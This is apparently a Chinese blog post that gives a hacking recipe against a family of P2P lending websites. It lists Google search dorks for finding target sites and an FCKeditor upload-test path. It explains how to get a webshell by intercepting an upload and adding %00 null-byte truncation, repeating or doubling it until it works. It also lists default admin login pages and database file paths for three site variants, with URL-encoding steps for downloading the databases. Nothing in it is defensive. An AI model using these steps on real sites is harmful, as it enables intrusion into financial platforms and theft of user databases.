某p2p存在通用上传漏洞

google链接查找:

inurl:shouyi.asp
inurl:itemlist_xq.asp?id=

很多存在Fckeditor上传链接:

1
FCKeditor/editor/filemanager/connectors/uploadtest.html

 

抓包上传%00截断后发送就能获取shell

如果一次发送不行, 就发送多几次即可

如果多次发送同一数据包不行就把%00改成两个%00%00再截断送送一次或多次即可拿shell

 

通用后台与数据库下载:

1
2
3
4
5
6
7
8
9
10
11
12
后台:   cpcms_admin\cplogin.asp
数据库: cp_data\cp_dsds%#^&@!daaa_cc\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb
数据库: cp_data\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb
 
后台:   ajcmsadmin\account.asp
数据库: ajcmsadmin\nnyylczccydata\#$ssjjb##17#654543534546$3$3.mdb
 
 
后台:   ailangeadmin\account.asp
数据库: shujukuDSDFE489#$###789sdf\DS#@FCsad54534234433###\#$ssjjb##17#65454###23233534546$3$3.mdb

 

 

 

注意, 如果要下载数据库, 要把特殊字符转为url编码。

比如:

1
2
3
cp_data\cp_dsds%#^&@!daaa_cc\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb
转码为:
cp_data\cp_dsds%25%23%5e%26%40%21%64%61%61%61%5f%63%63%5c%23%24%73%73%6a%6a%62%23%23%31%37%23%36%35%26%26%5e%5f%5e%25%40%26%40%33%34%35%34%36%24%33%24%33%2e%6d%64%62

 

些种p2p界面型形如下:

 

posted on   Perl6  阅读(581)  评论(0编辑  收藏  举报

编辑推荐:
· 从二进制到误差:逐行拆解C语言浮点运算中的4008175468544之谜
· .NET制作智能桌面机器人:结合BotSharp智能体框架开发语音交互
· 软件产品开发中常见的10个问题及处理方法
· .NET 原生驾驭 AI 新基建实战系列:向量数据库的应用与畅想
· 从问题排查到源码分析:ActiveMQ消费端频繁日志刷屏的秘密
阅读排行:
· 《HelloGitHub》第 108 期
· Windows桌面应用自动更新解决方案SharpUpdater5发布
· 我的家庭实验室服务器集群硬件清单
· C# 13 中的新增功能实操
· Supergateway:MCP服务器的远程调试与集成工具

导航

< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5
点击右上角即可分享
微信分享提示